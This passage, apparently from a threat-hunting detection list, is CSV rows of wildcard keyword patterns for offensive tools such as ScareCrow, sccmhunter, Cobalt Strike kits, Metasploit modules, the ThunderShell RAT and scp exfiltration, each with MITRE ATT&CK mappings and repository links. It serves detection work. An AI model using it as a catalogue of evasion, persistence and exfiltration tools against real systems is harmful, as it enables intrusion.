+"*ScareCrow_*_linux_amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow_*amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow_checksums.txt*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*SCCM_DLLSiteloading.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*sccmdecryptpoc.*","offensive_tool_keyword","sccmdecryptpoc","SCCM Account Password Decryption POC","T1555.003","TA0006","N/A","N/A","Credential Access","https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*sccmhunter.db","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z"
+"*sccmhunter.git*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z"
+"*sccmhunter.py*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" 
+"*sccmwtf.py*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z"
+"*scdivert localhost *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*scheduledtask_utils.py *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"*ScheduleRunner.csproj*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z"
+"*ScheduleRunner.exe*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 
T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z"
+"*ScheduleRunner.sln*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z"
+"*schlamperei.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*schshell.cna*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z"
+"*schtask_callback*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z"
+"*SchTaskBackdoor.*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
+"*schtasks /query /v /fo LIST*","greyware_tool_keyword","schtasks","view detailed information about all the scheduled tasks.","T1053.005 - T1082","TA0004 - TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*schtasks_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z"
+"*schtasks_exploit *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z"
+"*schtasksabuse.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*SchTasksImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*schtquery * full*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*scout aws --profile default -f*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*scout azure --cli*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*scp * *@*:*","greyware_tool_keyword","scp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - 
TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*scp *@*:* *","greyware_tool_keyword","scp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*screen /dev/ttyACM0 115200*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*screen_spy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*screengrab.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*screenshot_inject *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*screenspy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Screetsec*","offensive_tool_keyword","Github Username","github username hosting post exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*screetsec/Microsploit*","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" +"*screetsec/Pateensy*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*screetsec/Sudomy*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*screetsec/Vegile*","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" +"*--script broadcast-dhcp-discover*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*script/xor-bin.py*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" 
+"*scripthost_uac_bypass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*scripts*Remote-WmiExecute.*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*scripts*Search-EventForUser.ps1*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. 
RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*ScriptSentry-main.zip*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*ScRunBase32.exe*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" +"*ScRunBase32.py*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader 
(Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" +"*ScRunBase64.exe*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 
- Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" +"*ScRunBase64.py*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" +"*scshell*XblAuthManager*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 